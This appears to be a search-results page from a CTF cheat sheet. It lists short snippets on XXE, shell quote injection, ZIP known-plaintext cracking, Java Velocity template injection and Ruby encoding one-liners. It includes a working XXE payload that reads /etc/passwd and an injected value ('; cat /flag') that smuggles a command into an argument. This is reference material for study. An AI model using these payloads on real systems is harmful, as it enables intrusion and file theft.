Search Results

XXE XML External Entity <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> <root>&test;</root>

Shell single quote For date '$FORMAT' FORMAT '; cat /flag' Gives date ''; cat /flag''

Known plaintext (file) https://github.com/keyunluo/pkcrack Need one exact file in plaintext from the encrypted archive. The ZIP archive encrypts each file individually but using same key, so one can list contents and file sizes before and after compression. ...

Server Side Template Injections Template injections examples Java - Velocity Runs command Gets String([binary], encoding) constructor (we can't call new in context of template) Calls constructor to convert binary array of command output to UTF-8 string for ...

Chunk s.scan(/......./) Binary to integer s.to_i(2) Integer to ASCII character 123.chr Hex to integer "7D".to_i(16) Integer to hex 125.to_s(16)